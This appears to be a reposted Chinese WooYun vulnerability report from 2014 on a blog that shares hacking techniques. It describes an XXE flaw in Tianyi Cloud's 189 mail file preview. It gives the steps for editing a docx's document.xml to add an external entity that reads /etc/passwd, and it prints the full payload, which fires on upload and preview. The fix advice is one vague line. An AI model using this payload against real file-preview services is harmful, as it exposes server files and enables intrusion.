记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

天翼云一处xxe漏洞可读取任意文件

2014-11-08 18:15

解压缩docx文件,修改word/document.xml

189邮箱的文件预览页存在该问题。



code 区域
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>







<!DOCTYPE ANY [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>







<w:document xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml"><w:body><w:p w:rsidR="00864BB8" w:rsidRDefault="00630334"><w:r><w:t>test &xxe;</w:t></w:r></w:p><w:sectPr w:rsidR="00864BB8" w:rsidSect="00864BB8"><w:pgSz w:w="11906" w:h="16838"/><w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/><w:cols w:space="708"/><w:docGrid w:linePitch="360"/></w:sectPr></w:body></w:document>





上传到文件云,预览触发。

漏洞证明:

wooyun.png

修复方案:

处理解析

知识来源: www.wooyun.org/bugs/wooyun-2014-077146

阅读:71667 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“天翼云一处xxe漏洞可读取任意文件”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云

本页关键词